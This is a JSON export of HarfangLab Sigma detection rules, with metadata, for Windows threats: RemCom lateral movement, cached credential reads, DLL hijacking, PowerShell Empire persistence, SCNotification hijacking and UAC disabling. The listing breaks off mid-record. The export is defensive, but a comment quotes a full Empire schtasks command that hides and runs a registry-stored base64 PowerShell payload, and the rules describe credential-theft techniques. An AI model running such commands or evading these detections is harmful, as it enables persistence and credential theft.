"content": "title: RemCom Named Pipe Connected\nid: 40eea7ed-b9cd-4cae-94cb-3ed700cef311\ndescription: |\n Detects the connection to a Named Pipe pertaining to RemCom.\n RemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\n It is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\nreferences:\n - https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - attack.t1072\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Tool.RemCom\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName|endswith: '\\RemCom_communicaton'\n\n exclusion_system:\n ProcessName: 'system'\n\n # Exclusion for ADSelfService Plus\n # https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-remcomsvc-exe-is-detected-as-a-threat\n exclusion_adselfservice:\n # ADSelfService Plus use two backslashes in the command line\n ProcessCommandLine: '?:\\Windows\\\\\\\\RemComSvc.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n # exclusion from the client side\n exclusion_manageengine_client:\n # ..\\bin\\RemCom.exe \\\\YYYYYY /user:xxxx\\Manage_Engine_AD /pwd:* wmic logicaldisk list brief /format:\"%WINDIR%\\System32\\wbem\\en-us\\csv\"\n ProcessImage|endswith: '\\ManageEngine\\ADAudit Plus\\bin\\RemCom.exe'\n\n exclusion_manageengine_bundle:\n ProcessImage|endswith:\n - 'UEMS_CentralServer\\bin\\RemCom.exe'\n - '?:\\Windows\\SysWOW64\\RemComSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ZOHO Corporation Private Limited'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40eea7ed-b9cd-4cae-94cb-3ed700cef311",
"rule_name": "RemCom Named Pipe Connected",
"rule_description": "Detects the connection to a Named Pipe pertaining to RemCom.\nRemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\nIt is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1072",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "410c0f21-4dbe-47b1-b477-4065e2398153",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095935Z",
"creation_date": "2026-03-23T11:45:34.095937Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095942Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials",
"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8",
"https://attack.mitre.org/techniques/T1003/005/"
],
"name": "t1003_002_susp_registry_read_mscache.yml",
"content": "title: Cached Domain Credentials Read from Registry\nid: 410c0f21-4dbe-47b1-b477-4065e2398153\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows cache information related to domain accounts.\n Adversaries may attempt to access cached domain credentials used to allow authentication in the event a domain controller is unavailable.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials\n - https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8\n - https://attack.mitre.org/techniques/T1003/005/\ndate: 2024/04/02\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.005\n - attack.discovery\n - attack.t1012\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKLM\\SECURITY\\CACHE\\'\n Image|contains: '?'\n\n # does not contain actual hashes\n filter_control:\n TargetObject: 'HKLM\\SECURITY\\Cache\\NL$Control'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n exclusion_velociraptor:\n ProcessImage: '?:\\Program Files\\Velociraptor\\Velociraptor.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "410c0f21-4dbe-47b1-b477-4065e2398153",
"rule_name": "Cached Domain Credentials Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing Windows cache information related to domain accounts.\nAdversaries may attempt to access cached domain credentials used to allow authentication in the event a domain controller is unavailable.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1003.005",
"attack.t1012",
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096427Z",
"creation_date": "2026-03-23T11:45:34.096429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_telnet.yml",
"content": "title: DLL Hijacking via telnetc.exe\nid: 412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5\ndescription: |\n Detects potential Windows DLL Hijacking via telnetc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'telnetc.exe'\n ImageLoaded|endswith: '\\security.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "412822e9-7d4c-4c6a-a2b4-aa2ce0e788c5",
"rule_name": "DLL Hijacking via telnetc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via telnetc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "415ead88-88d6-4df2-97f3-ce11909c0e62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607086Z",
"creation_date": "2026-03-23T11:45:34.607089Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607097Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-8.0",
"https://cert.gov.ua/article/6276894",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_suspicious_process_started_by_powershell.yml",
"content": "title: Suspicious Process Started via PowerShell\nid: 415ead88-88d6-4df2-97f3-ce11909c0e62\ndescription: |\n Detects the use of the PowerShell \"Process.Start\" method to execute a process via command-line.\n In December 2023, APT28 attackers have been spotted executing process through PowerShell using this cmdlet, directly via command-line.\n It is recommended to investigate this command and the executed process to determine their legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start?view=net-8.0\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/01/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PoweShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: '[system.Diagnostics.Process]::Start('\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "415ead88-88d6-4df2-97f3-ce11909c0e62",
"rule_name": "Suspicious Process Started via PowerShell",
"rule_description": "Detects the use of the PowerShell \"Process.Start\" method to execute a process via command-line.\nIn December 2023, APT28 attackers have been spotted executing process through PowerShell using this cmdlet, directly via command-line.\nIt is recommended to investigate this command and the executed process to determine their legitimacy.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41b8f355-e9a0-4623-8e15-3ca931879b2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073294Z",
"creation_date": "2026-03-23T11:45:34.073296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073300Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BC-SECURITY/Empire",
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/software/S0363/"
],
"name": "t1053_005_empire_powershell_scheduled_task.yml",
"content": "title: PowerShell Empire Scheduled Task Persistence Added\nid: 41b8f355-e9a0-4623-8e15-3ca931879b2d\ndescription: |\n Detects the execution of a suspicious scheduled task related to the Empire attack framework.\n Empire is an open-source, cross-platform remote administration and post-exploitation framework where the post-exploitation agents are written in pure PowerShell for Windows.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://github.com/BC-SECURITY/Empire\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/software/S0363/\ndate: 2020/10/14\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.t1059.001\n - attack.s0363\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\system32\\schtasks.exe\" /Create /F /RU system /SC DAILY /ST 09:00 /TN Updater /TR \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\\Software\\Microsoft\\Network debug).debug)))\\\"\n CommandLine|contains|all:\n - '((gp '\n - '-NonI -W hidden -c '\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41b8f355-e9a0-4623-8e15-3ca931879b2d",
"rule_name": "PowerShell Empire Scheduled Task Persistence Added",
"rule_description": "Detects the execution of a suspicious scheduled task related to the Empire attack framework.\nEmpire is an open-source, cross-platform remote administration and post-exploitation framework where the post-exploitation agents are written in pure PowerShell for Windows.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41d7267d-3dda-4c98-b61e-b8ef463ac92c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073093Z",
"creation_date": "2026-03-23T11:45:34.073096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en",
"https://github.com/mandiant/ccmpwn",
"https://attack.mitre.org/techniques/T1072/"
],
"name": "t1072_scnotification_config_write.yml",
"content": "title: Windows Session Hijacking via SCNotification.exe Prepared\nid: 41d7267d-3dda-4c98-b61e-b8ef463ac92c\ndescription: |\n Detects the modification of the SCNotification.exe configuration file.\n Adversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\n It is recommended to check the content of the SCNotification.exe.config to identify any malicious content.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en\n - https://github.com/mandiant/ccmpwn\n - https://attack.mitre.org/techniques/T1072/\ndate: 2024/07/30\nmodified: 2025/07/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1072\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_create_write:\n Kind:\n - 'write'\n - 'create'\n Path|endswith: '?:\\Windows\\CCM\\SCNotification.exe.config'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|endswith: '?:\\Windows\\CCM\\SCNotification.exe.config'\n\n # CCM installer\n exclusion_msiexec:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41d7267d-3dda-4c98-b61e-b8ef463ac92c",
"rule_name": "Windows Session Hijacking via SCNotification.exe Prepared",
"rule_description": "Detects the modification of the SCNotification.exe configuration file.\nAdversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\nIt is recommended to check the content of the SCNotification.exe.config to identify any malicious content.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-07-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1072"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41d92614-4908-4b83-a287-690eb8445ed7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622813Z",
"creation_date": "2026-03-23T11:45:34.622815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_disabled.yml",
"content": "title: UAC Registry Configuration Disabled\nid: 41d92614-4908-4b83-a287-690eb8445ed7\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate the process performing the registry edit to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n Details: 'DWORD (0x00000000)'\n\n # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n # C:\\Windows\\system32\\UserAccountControlSettings.exe\n filter_useraccountsettings:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_ansible_powershell:\n ProcessImage|endswith: '\\powershell.exe'\n ProcessCommandLine|contains:\n # \"Ansible requires PowerShell v3.0 or newer\" UTF-16LE with all 3 offsets\n - 'QQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByA'\n - 'EAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcg'\n - 'BAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIA'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessOriginalFileName:\n - 'clickshare.exe'\n - 'ClickShare_for_Windows.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Barco N.V.'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_cobas:\n ProcessOriginalFileName: 'CobasInfinityInstaller.exe'\n\n exclusion_legitimate_programs:\n ProcessImage:\n - '?:\\Program Files (x86)\\wps-ipro2\\wps-ipro2.exe'\n - '?:\\Program Files (x86)\\black box whps\\whps.exe'\n - '?:\\Program Files (x86)\\logmein\\x64\\logmein.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\sources\\setupplatform.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_vmware airWatch:\n # C:\\Program Files (x86)\\Airwatch\\AgentUI\\TaskScheduler.exe\n ProcessOriginalFileName: 'TaskScheduler.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VMware, Inc.'\n\n exclusion_roche:\n ProcessOriginalFileName: 'RITS_InfinityModulesInstaller.exe'\n ProcessDescription: 'Roche IT Infinity Modules Installer'\n ProcessCompany: 'Roche Diagnostics'\n\n exclusion_wps-ipro:\n ProcessOriginalFileName: 'WPS-IPro2.exe'\n ProcessProduct: 'Wireless Presentation System'\n ProcessCompany: 'AWIND Inc.'\n\n exclusion_iagona:\n ProcessImage|contains: 'Neoscreen'\n ProcessDescription: 'Installation Pack'\n ProcessProduct: 'Neoscreen'\n ProcessCompany: 'IAGONA'\n\n # https://www.tranquil.it/\n exclusion_tranquil:\n ProcessGrandparentProduct: 'WAPT'\n ProcessGrandparentCompany: 'Tranquil IT'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Tranquil I.T. Systems'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n exclusion_provconnect:\n ProcessGrandparentImage: '?:\\Program Files\\proVconnect\\proVconnect Device Agent\\Device Agent\\bin\\proVconnect.Agent.Windows.exe'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgentPatcher.exe|?:\\Windows\\System32\\services.exe|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41d92614-4908-4b83-a287-690eb8445ed7",
"rule_name": "UAC Registry Configuration Disabled",
"rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the complete disabling of the UAC consent window.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate the process performing the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42063cd7-a184-4060-aa08-24504240bb0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
